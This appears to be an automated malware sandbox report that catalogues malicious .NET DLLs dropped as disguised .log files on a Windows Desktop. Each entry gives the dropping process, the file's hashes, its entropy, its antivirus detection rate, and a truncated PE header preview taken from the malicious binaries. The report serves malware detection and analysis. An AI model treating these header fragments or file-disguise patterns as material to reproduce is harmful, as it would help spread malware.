Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\EqAsTbqX.log

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FuissdNI.log

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\GLhaJjhM.log

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\IsmZtopJ.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\JSejfBbH.log

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\JmBJbHgR.log

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\JryrolxS.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\KWThvPSL.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\LXhZiUrJ.log

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MZFQQyWG.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\QYTGHhqw.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\RXtRpjXE.log

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\SUVZKjmy.log

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ViDyzjon.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\VmdPWrri.log

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\VuNhAaSo.log

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XWHGkwkl.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\bmTftlYf.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\cACFdGgc.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\djIfBqMY.log

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\eGaXQvvb.log

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\etRnODSa.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\flhVkUrV.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
